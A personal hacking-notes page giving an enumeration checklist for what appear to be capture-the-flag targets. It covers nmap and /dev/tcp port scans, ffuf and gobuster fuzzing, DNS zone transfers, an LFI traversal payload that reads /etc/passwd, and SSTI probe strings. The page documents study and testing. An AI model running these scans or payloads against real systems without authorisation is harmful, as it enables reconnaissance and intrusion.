Skip to main content
  1. Hacking/

Enumeration Checklist

Table of Contents
Disclaimer: These are my personal notes, published "as-is" without warranty or guarantee of any kind. Use at your own risk. Licensed CC BY-NC-SA 4.0.

Setup #

export IP=http://10.10.10.10

nmap #

sudo nmap -p- $IP --open # Just show open ports
sudo nmap -p- -Pn -sS -n -sC -A -T4 -v $IP # david exploit scan
sudo nmap -v -sV -sC -O -T4 -n -Pn -oA fastscan $IP # 1000 port fastscan
sudo nmap -v -sV -sC -O -T4 -n -Pn -p- -oA --min-rate 5000 fullfastscan $IP # all port fastscan

Also try -sU for UDP.

  • Extras

    • Threader3000
    • Port scan (basic): nmap -sV IP
    • Port scan (advanced): nmap -sS -sV -sC -O -T4 -Pn -n IP
    • Network sweep: nmap -sn 192.168.0.1-254
    • Enumerate Samba: nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse IP
    • Enumerate network fs: nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount
    • Scan for vulns: nmap -sV -vv --script vuln IP

  • Opts

    • -p- all ports
    • -Pn assume online
    • -sS TCP SYN
    • -n don’t do host resolution
    • -sC exploit script scan
    • -A OS detection
    • -T4 timing template 4
    • -v verbosity

  • No nmap

    for PORT in {0..1000}; do timeout 1 bash -c "</dev/tcp/172.19.0.1/$PORT &>/dev/null" 2>/dev/null && echo "port $PORT is open"; done

  • Can also try RustScan.

Fuzzing #

Directories #

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt:FUZZ -u http://$IP/FUZZ -t 200 -fc 404

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt:FUZZ -u http://$IP/FUZZ/ -t 200 -fc 404

Extensions #

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/raft-large-extensions.txt:FUZZ -u http://$IP/blog/indexFUZZ -t 200 -fc 404

Files #

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt:FUZZ -u http://$IP/blog/FUZZ.php -t 200 -fc 404

Subdomains (vhost) #

gobuster vhost -u https://example.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k

ffuf -c -w ~/Sync/Sec/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://trick.htb -H "Host: preprod-FUZZ.trick.htb" -t 200 -fs 5480

Web - SQL Injection? #

Copy as cURL into sqlmap.

Other services #

  • Enum DNS

    • Commands to try:

      
    dnsrecon -r 127.0.0.0/24 -n {IP} -d {Domain_Name}
    dnsrecon -r 127.0.1.0/24 -n {IP} -d {Domain_Name}
    dnsrecon -r {Network}{CIDR} -n {IP} -d {Domain_Name}
    dig axfr @{IP}
    dig axfr {Domain_Name} @{IP}
    nslookup
        SERVER {IP}
        127.0.0.1
        {IP}
        Domain_Name
        exit

  • Enum SMTP

LFI #

/index.php?page=..././..././..././..././..././etc/passwd

SSTI #

General tests #

{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
*{7*7}
#{7*7}

Other payloads #

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server Side Template Injection/README.md